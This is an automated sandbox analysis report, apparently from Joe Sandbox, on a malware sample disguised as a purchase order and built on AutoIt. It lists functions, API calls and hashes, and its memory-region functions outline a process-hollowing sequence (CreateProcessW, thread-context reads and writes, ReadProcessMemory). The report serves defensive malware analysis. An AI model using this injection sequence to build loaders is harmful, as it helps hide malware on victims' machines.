                                control_flow_graph 650 153170-153185 651 1531e5-1531e7 650->651 652 153187-15318a 650->652 651->652 653 1531e9 651->653 654 15318c-153193 652->654 655 1531eb 652->655 656 1531d0-1531d8 DefWindowProcW 653->656 659 153265-15326d PostQuitMessage 654->659 660 153199-15319e 654->660 657 192dfb-192e23 call 1518e2 call 16e499 655->657 658 1531f1-1531f6 655->658 661 1531de-1531e4 656->661 693 192e28-192e2f 657->693 663 15321d-153244 SetTimer RegisterWindowMessageW 658->663 664 1531f8-1531fb 658->664 662 153219-15321b 659->662 666 1531a4-1531a8 660->666 667 192e7c-192e90 call 1bbf30 660->667 662->661 663->662 672 153246-153251 CreatePopupMenu 663->672 669 153201-153214 KillTimer call 1530f2 call 153c50 664->669 670 192d9c-192d9f 664->670 673 192e68-192e77 call 1bc161 666->673 674 1531ae-1531b3 666->674 667->662 686 192e96 667->686 669->662 678 192da1-192da5 670->678 679 192dd7-192df6 MoveWindow 670->679 672->662 673->662 675 192e4d-192e54 674->675 676 1531b9-1531be 674->676 675->656 689 192e5a-192e63 call 1b0ad7 675->689 684 1531c4-1531ca 676->684 685 153253-153263 call 15326f 676->685 687 192da7-192daa 678->687 688 192dc6-192dd2 SetFocus 678->688 679->662 684->656 684->693 685->662 686->656 687->684 694 192db0-192dc1 call 1518e2 687->694 688->662 689->656 693->656 698 192e35-192e48 call 1530f2 call 153837 693->698 694->662 698->656
                                APIs
                                • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,0015316A,?,?), ref: 001531D8
                                • KillTimer.USER32(?,00000001,?,?,?,?,?,0015316A,?,?), ref: 00153204
                                • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00153227
                                • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,0015316A,?,?), ref: 00153232
                                • CreatePopupMenu.USER32 ref: 00153246
                                • PostQuitMessage.USER32(00000000), ref: 00153267
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                • String ID: TaskbarCreated
                                • API String ID: 129472671-2362178303
                                • Opcode ID: b0f331cab91a1ba589bef847fbeb9a3e474c748e66f85cc96c5cb3523cfc6dbe
                                • Instruction ID: 389454fc490a789ce3d0748bcb41b302b47e659529619440398dac85b043004b
                                • Opcode Fuzzy Hash: b0f331cab91a1ba589bef847fbeb9a3e474c748e66f85cc96c5cb3523cfc6dbe
                                • Instruction Fuzzy Hash: 36416B34600644FBDF286BF8AC8DF7D3A5AE715382F040125FD318F1A1CB718A9997A1
                                Function 0015DFD0 Relevance: 15.4, APIs: 2, Strings: 6, Instructions: 1414COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID:
                                • String ID: D%"$D%"$D%"$D%"$D%"D%"$Variable must be of type 'Object'.
                                • API String ID: 0-2232411389
                                • Opcode ID: cd651e4ffac6cb25faf0d266797103f81c1c40d134659d7caa8a82d1982648a1
                                • Instruction ID: 35e466c78d2816cd3f2abdd6d4dc664f1d3f82cf47a0d9dfad153ee2f59ce889
                                • Opcode Fuzzy Hash: cd651e4ffac6cb25faf0d266797103f81c1c40d134659d7caa8a82d1982648a1
                                • Instruction Fuzzy Hash: A2C29C75E00204DFCB28CF98D884BADB7F1BF19311F258159E925AB291D331EE5ACB91
                                Function 036DFA40 Relevance: 10.7, APIs: 7, Instructions: 239fileCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1216 36dfa40-36dfaee call 36dd460 1219 36dfaf5-36dfb1b call 36e0950 CreateFileW 1216->1219 1222 36dfb1d 1219->1222 1223 36dfb22-36dfb32 1219->1223 1224 36dfc6d-36dfc71 1222->1224 1231 36dfb39-36dfb53 VirtualAlloc 1223->1231 1232 36dfb34 1223->1232 1225 36dfcb3-36dfcb6 1224->1225 1226 36dfc73-36dfc77 1224->1226 1228 36dfcb9-36dfcc0 1225->1228 1229 36dfc79-36dfc7c 1226->1229 1230 36dfc83-36dfc87 1226->1230 1235 36dfd15-36dfd2a 1228->1235 1236 36dfcc2-36dfccd 1228->1236 1229->1230 1237 36dfc89-36dfc93 1230->1237 1238 36dfc97-36dfc9b 1230->1238 1233 36dfb5a-36dfb71 ReadFile 1231->1233 1234 36dfb55 1231->1234 1232->1224 1239 36dfb78-36dfbb8 VirtualAlloc 1233->1239 1240 36dfb73 1233->1240 1234->1224 1243 36dfd2c-36dfd37 VirtualFree 1235->1243 1244 36dfd3a-36dfd42 1235->1244 1241 36dfccf 1236->1241 1242 36dfcd1-36dfcdd 1236->1242 1237->1238 1245 36dfc9d-36dfca7 1238->1245 1246 36dfcab 1238->1246 1247 36dfbbf-36dfbda call 36e0ba0 1239->1247 1248 36dfbba 1239->1248 1240->1224 1241->1235 1249 36dfcdf-36dfcef 1242->1249 1250 36dfcf1-36dfcfd 1242->1250 1243->1244 1245->1246 1246->1225 1256 36dfbe5-36dfbef 1247->1256 1248->1224 1252 36dfd13 1249->1252 1253 36dfcff-36dfd08 1250->1253 1254 36dfd0a-36dfd10 1250->1254 1252->1228 1253->1252 1254->1252 1257 36dfbf1-36dfc20 call 36e0ba0 1256->1257 1258 36dfc22-36dfc36 call 36e09b0 1256->1258 1257->1256 1263 36dfc38 1258->1263 1264 36dfc3a-36dfc3e 1258->1264 1263->1224 1266 36dfc4a-36dfc4e 1264->1266 1267 36dfc40-36dfc44 CloseHandle 1264->1267 1268 36dfc5e-36dfc67 1266->1268 1269 36dfc50-36dfc5b VirtualFree 1266->1269 1267->1266 1268->1219 1268->1224 1269->1268
                                APIs
                                • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 036DFB11
                                • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 036DFD37
                                Memory Dump Source
                                • Source File: 00000000.00000002.2063045889.00000000036DD000.00000040.00000020.00020000.00000000.sdmp, Offset: 036DD000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_36dd000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: CreateFileFreeVirtual
                                • String ID:
                                • API String ID: 204039940-0
                                • Opcode ID: 014c9b5c74d83c0a726ef6016946af978a068631e2f3efa1e9065a42f07dad7c
                                • Instruction ID: 49c8d9360d4111c22e692f2f00ebe6858743781dc25aef8bea2ef1e5ea9f740d
                                • Opcode Fuzzy Hash: 014c9b5c74d83c0a726ef6016946af978a068631e2f3efa1e9065a42f07dad7c
                                • Instruction Fuzzy Hash: 8CA10574E00209EBDB14CFA4C994BEEBBB5FF48304F248599E506BB380D7759A81CB94
                                Function 00152C63 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1280 152c63-152cd3 CreateWindowExW * 2 ShowWindow * 2
                                APIs
                                • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00152C91
                                • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00152CB2
                                • ShowWindow.USER32(00000000,?,?,?,?,?,?,00151CAD,?), ref: 00152CC6
                                • ShowWindow.USER32(00000000,?,?,?,?,?,?,00151CAD,?), ref: 00152CCF
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Window$CreateShow
                                • String ID: AutoIt v3$edit
                                • API String ID: 1584632944-3779509399
                                • Opcode ID: 609bedc9f948df990950406489f3f230b16dc9bb547066eab377f04b45e4842f
                                • Instruction ID: b3610b9807e9c10911eb4002153c4be3c31df604297b6eb06743b222432c2d5d
                                • Opcode Fuzzy Hash: 609bedc9f948df990950406489f3f230b16dc9bb547066eab377f04b45e4842f
                                • Instruction Fuzzy Hash: 6BF03A759403D47AEB304797BC4CE7B3EBED7DAF50B0110AAF900A65A0C2710862DAB0
                                Function 001510F3 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 153comCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                APIs
                                  • Part of subcall function 00151BC3: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00151BF4
                                  • Part of subcall function 00151BC3: MapVirtualKeyW.USER32(00000010,00000000), ref: 00151BFC
                                  • Part of subcall function 00151BC3: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00151C07
                                  • Part of subcall function 00151BC3: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00151C12
                                  • Part of subcall function 00151BC3: MapVirtualKeyW.USER32(00000011,00000000), ref: 00151C1A
                                  • Part of subcall function 00151BC3: MapVirtualKeyW.USER32(00000012,00000000), ref: 00151C22
                                  • Part of subcall function 00151B4A: RegisterWindowMessageW.USER32(00000004,?,001512C4), ref: 00151BA2
                                • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0015136A
                                • OleInitialize.OLE32 ref: 00151388
                                • CloseHandle.KERNEL32(00000000,00000000), ref: 001924AB
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                • String ID: (F$8E
                                • API String ID: 1986988660-3121805947
                                • Opcode ID: 2054f7988b704262271a2bdcbc1e2a08f23171d050befb70204785570737961e
                                • Instruction ID: b7e3722a0c2ae6b87b1220d582af9d9f125d0cca09defd9e3b1e8167a2f9fc4c
                                • Opcode Fuzzy Hash: 2054f7988b704262271a2bdcbc1e2a08f23171d050befb70204785570737961e
                                • Instruction Fuzzy Hash: 4171D1B4811244BED7A4EFF9BD89E553AE0BBB834439462BAD41ACB261E7344437CF41
                                Function 036DF810 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 147fileCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1438 36df810-36df942 call 36dd460 call 36df700 CreateFileW 1445 36df949-36df959 1438->1445 1446 36df944 1438->1446 1449 36df95b 1445->1449 1450 36df960-36df97a VirtualAlloc 1445->1450 1447 36df9f9-36df9fe 1446->1447 1449->1447 1451 36df97c 1450->1451 1452 36df97e-36df995 ReadFile 1450->1452 1451->1447 1453 36df999-36df9d3 call 36df740 call 36de700 1452->1453 1454 36df997 1452->1454 1459 36df9ef-36df9f7 ExitProcess 1453->1459 1460 36df9d5-36df9ea call 36df790 1453->1460 1454->1447 1459->1447 1460->1459
                                APIs
                                  • Part of subcall function 036DF700: Sleep.KERNELBASE(000001F4), ref: 036DF711
                                • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 036DF938
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2063045889.00000000036DD000.00000040.00000020.00020000.00000000.sdmp, Offset: 036DD000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_36dd000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: CreateFileSleep
                                • String ID: X82E5RR84F7XNHHKAB00KDRAYZ3UO
                                • API String ID: 2694422964-640551944
                                • Opcode ID: c9dce6770700ac2193a911e95f968c3c33fb0004a5b7898994eb4ce5363c6188
                                • Instruction ID: 0678dd614776eed3f236892a1040bca67ec6e7337378afee6d5f083e0fe7c223
                                • Opcode Fuzzy Hash: c9dce6770700ac2193a911e95f968c3c33fb0004a5b7898994eb4ce5363c6188
                                • Instruction Fuzzy Hash: 58514171D04388EAEF12D7B4C858BDEBB78AF15304F044199E6497B2C1CBB91B49CBA5
                                Function 00153B1C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1772 153b1c-153b27 1773 153b99-153b9b 1772->1773 1774 153b29-153b2e 1772->1774 1776 153b8c-153b8f 1773->1776 1774->1773 1775 153b30-153b48 RegOpenKeyExW 1774->1775 1775->1773 1777 153b4a-153b69 RegQueryValueExW 1775->1777 1778 153b80-153b8b RegCloseKey 1777->1778 1779 153b6b-153b76 1777->1779 1778->1776 1780 153b90-153b97 1779->1780 1781 153b78-153b7a 1779->1781 1782 153b7e 1780->1782 1781->1782 1782->1778
                                APIs
                                • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00153B0F,SwapMouseButtons,00000004,?), ref: 00153B40
                                • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00153B0F,SwapMouseButtons,00000004,?), ref: 00153B61
                                • RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,00153B0F,SwapMouseButtons,00000004,?), ref: 00153B83
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: CloseOpenQueryValue
                                • String ID: Control Panel\Mouse
                                • API String ID: 3677997916-824357125
                                • Opcode ID: f48dbbc770470e6fda1ec9a14b0e8887d808ae09f95cbef7ccf183ce99fb5b9c
                                • Instruction ID: f0334f4aea488dab96224e12e8b01e6d658bb8a024b8cbc38965afd9d38cb95c
                                • Opcode Fuzzy Hash: f48dbbc770470e6fda1ec9a14b0e8887d808ae09f95cbef7ccf183ce99fb5b9c
                                • Instruction Fuzzy Hash: F1112AB5510218FFDB21CFA5DC84AAEB7B8EF44785B104459F825DB110D3319F4597A0
                                Function 036DE700 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1783 36de700-36de7a0 call 36e0b80 * 3 1790 36de7b7 1783->1790 1791 36de7a2-36de7ac 1783->1791 1792 36de7be-36de7c7 1790->1792 1791->1790 1793 36de7ae-36de7b5 1791->1793 1794 36de7ce-36dee80 1792->1794 1793->1792 1795 36dee93-36deec0 CreateProcessW 1794->1795 1796 36dee82-36dee86 1794->1796 1803 36deeca 1795->1803 1804 36deec2-36deec5 1795->1804 1797 36deecc-36deef9 1796->1797 1798 36dee88-36dee8c 1796->1798 1819 36deefb-36deefe 1797->1819 1820 36def03 1797->1820 1799 36dee8e 1798->1799 1800 36def05-36def32 1798->1800 1802 36def3c-36def56 Wow64GetThreadContext 1799->1802 1800->1802 1824 36def34-36def37 1800->1824 1807 36def5d-36def78 ReadProcessMemory 1802->1807 1808 36def58 1802->1808 1803->1802 1809 36df2c1-36df2c3 1804->1809 1811 36def7f-36def88 1807->1811 1812 36def7a 1807->1812 1810 36df26a-36df26e 1808->1810 1817 36df2bf 1810->1817 1818 36df270-36df274 1810->1818 1815 36def8a-36def99 1811->1815 1816 36defb1-36defd0 call 36e0200 1811->1816 1812->1810 1815->1816 1825 36def9b-36defaa call 36e0150 1815->1825 1831 36defd7-36deffa call 36e0340 1816->1831 1832 36defd2 1816->1832 1817->1809 1821 36df289-36df28d 1818->1821 1822 36df276-36df282 1818->1822 1819->1809 1820->1802 1827 36df28f-36df292 1821->1827 1828 36df299-36df29d 1821->1828 1822->1821 1824->1809 1825->1816 1836 36defac 1825->1836 1827->1828 1833 36df29f-36df2a2 1828->1833 1834 36df2a9-36df2ad 1828->1834 1842 36deffc-36df003 1831->1842 1843 36df044-36df065 call 36e0340 1831->1843 1832->1810 1833->1834 1838 36df2af-36df2b5 call 36e0150 1834->1838 1839 36df2ba-36df2bd 1834->1839 1836->1810 1838->1839 1839->1809 1845 36df03f 1842->1845 1846 36df005-36df036 call 36e0340 1842->1846 1849 36df06c-36df08a call 36e0ba0 1843->1849 1850 36df067 1843->1850 1845->1810 1853 36df03d 1846->1853 1854 36df038 1846->1854 1856 36df095-36df09f 1849->1856 1850->1810 1853->1843 1854->1810 1857 36df0d5-36df0d9 1856->1857 1858 36df0a1-36df0d3 call 36e0ba0 1856->1858 1860 36df0df-36df0ef 1857->1860 1861 36df1c4-36df1e1 call 36dfd50 1857->1861 1858->1856 1860->1861 1864 36df0f5-36df105 1860->1864 1868 36df1e8-36df207 Wow64SetThreadContext 1861->1868 1869 36df1e3 1861->1869 1864->1861 1867 36df10b-36df12f 1864->1867 1870 36df132-36df136 1867->1870 1872 36df209 1868->1872 1873 36df20b-36df216 call 36e0080 1868->1873 1869->1810 1870->1861 1871 36df13c-36df151 1870->1871 1874 36df165-36df169 1871->1874 1872->1810 1879 36df218 1873->1879 1880 36df21a-36df21e 1873->1880 1876 36df16b-36df177 1874->1876 1877 36df1a7-36df1bf 1874->1877 1881 36df179-36df1a3 1876->1881 1882 36df1a5 1876->1882 1877->1870 1879->1810 1883 36df22a-36df22e 1880->1883 1884 36df220-36df223 1880->1884 1881->1882 1882->1874 1886 36df23a-36df23e 1883->1886 1887 36df230-36df233 1883->1887 1884->1883 1888 36df24a-36df24e 1886->1888 1889 36df240-36df243 1886->1889 1887->1886 1890 36df25b-36df264 1888->1890 1891 36df250-36df256 call 36e0150 1888->1891 1889->1888 1890->1794 1890->1810 1891->1890
                                APIs
                                • CreateProcessW.KERNELBASE(?,00000000), ref: 036DEEBB
                                • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 036DEF51
                                • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 036DEF73
                                Memory Dump Source
                                • Source File: 00000000.00000002.2063045889.00000000036DD000.00000040.00000020.00020000.00000000.sdmp, Offset: 036DD000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_36dd000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Process$ContextCreateMemoryReadThreadWow64
                                • String ID:
                                • API String ID: 2438371351-0
                                • Opcode ID: b6a4c29ec9195df02a43fc4b15474606dfbde67be6cfae9816a363b0bdbc2b3f
                                • Instruction ID: aec35234898b3b54ed40be4acaf88b00d3571f69c23672d9f106be8c37b842af
                                • Opcode Fuzzy Hash: b6a4c29ec9195df02a43fc4b15474606dfbde67be6cfae9816a363b0bdbc2b3f
                                • Instruction Fuzzy Hash: 4062F934E142589BEB24CFA4C850BDEB776EF58300F1091A9D10DEB394E77A9E81CB59
                                Function 00153923 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 94windowCOMMON
                                Download Yara Rule
                                APIs
                                • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 001933A2
                                  • Part of subcall function 00156B57: _wcslen.LIBCMT ref: 00156B6A
                                • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00153A04
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: IconLoadNotifyShell_String_wcslen
                                • String ID: Line:
                                • API String ID: 2289894680-1585850449
                                • Opcode ID: 1ec27b45286659e3d68c3ffefd5b50a82124f61a1e9dcf8a6d5926ca6021d623
                                • Instruction ID: 45db604e97f9be54285074f500d90cd7ba81e5562891da5f36c691529aec36c2
                                • Opcode Fuzzy Hash: 1ec27b45286659e3d68c3ffefd5b50a82124f61a1e9dcf8a6d5926ca6021d623
                                • Instruction Fuzzy Hash: B031D071408304EAC725EB60EC45FEBB7E8AB64355F00496AF9B98B091DB70965DC7C2
                                Function 00152DE3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64COMMON
                                Download Yara Rule
                                APIs
                                • GetOpenFileNameW.COMDLG32(?), ref: 00192C8C
                                  • Part of subcall function 00153AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00153A97,?,?,00152E7F,?,?,?,00000000), ref: 00153AC2
                                  • Part of subcall function 00152DA5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00152DC4
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Name$Path$FileFullLongOpen
                                • String ID: X$`e!
                                • API String ID: 779396738-4247064546
                                • Opcode ID: b61e56b9f93613f5df470afa4b12179bcfd770656f9c41f8629f370578f00c78
                                • Instruction ID: 23da9e6a72118012514a764e8b9dee6ff7fd8b9a096deeb11fa974ccc1de7399
                                • Opcode Fuzzy Hash: b61e56b9f93613f5df470afa4b12179bcfd770656f9c41f8629f370578f00c78
                                • Instruction Fuzzy Hash: 4F21C671A10258AFDF01DF94C849BEE7BF8AF59305F004059E815AB241DBB4558DCBA1
                                Function 0016FDDB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                                Download Yara Rule
                                APIs
                                • __CxxThrowException@8.LIBVCRUNTIME ref: 00170668
                                  • Part of subcall function 001732A4: RaiseException.KERNEL32(?,?,?,0017068A,?,00221444,?,?,?,?,?,?,0017068A,00151129,00218738,00151129), ref: 00173304
                                • __CxxThrowException@8.LIBVCRUNTIME ref: 00170685
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Exception@8Throw$ExceptionRaise
                                • String ID: Unknown exception
                                • API String ID: 3476068407-410509341
                                • Opcode ID: f7f01b169ffec3e30b8ad477875470ea52c77acd4776b2e7664ec09e750eed5e
                                • Instruction ID: db31edd7bda9dbad8db7d786f4887efe2cb9241e137d192a7372764bbf91e7e1
                                • Opcode Fuzzy Hash: f7f01b169ffec3e30b8ad477875470ea52c77acd4776b2e7664ec09e750eed5e
                                • Instruction Fuzzy Hash: 95F0C23490030DB7CB05BAA4EC96C9E7BBC5E64350B60C135B82C965D2EF71EB76C980
                                Function 001D7F59 Relevance: 4.9, APIs: 3, Instructions: 430COMMON
                                Download Yara Rule
                                APIs
                                • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 001D82F5
                                • TerminateProcess.KERNEL32(00000000), ref: 001D82FC
                                • FreeLibrary.KERNEL32(?,?,?,?), ref: 001D84DD
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Process$CurrentFreeLibraryTerminate
                                • String ID:
                                • API String ID: 146820519-0
                                • Opcode ID: 911d74d78cc79994a17ab70aacaec80d2a5f841ddf8ee89317924f1190dd7265
                                • Instruction ID: 757195486f09686e86e797024616ed5b770520ee1ef69a45ab9e1ffaa077e586
                                • Opcode Fuzzy Hash: 911d74d78cc79994a17ab70aacaec80d2a5f841ddf8ee89317924f1190dd7265
                                • Instruction Fuzzy Hash: EC125B719083419FC714DF28C484B6ABBE5BF99314F04895EE8998B392DB31E946CB92
                                Function 001886AE Relevance: 4.6, APIs: 3, Instructions: 61COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • CloseHandle.KERNELBASE(00000000,00000000,?,?,001885CC,?,00218CC8,0000000C), ref: 00188704
                                • GetLastError.KERNEL32(?,001885CC,?,00218CC8,0000000C), ref: 0018870E
                                • __dosmaperr.LIBCMT ref: 00188739
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
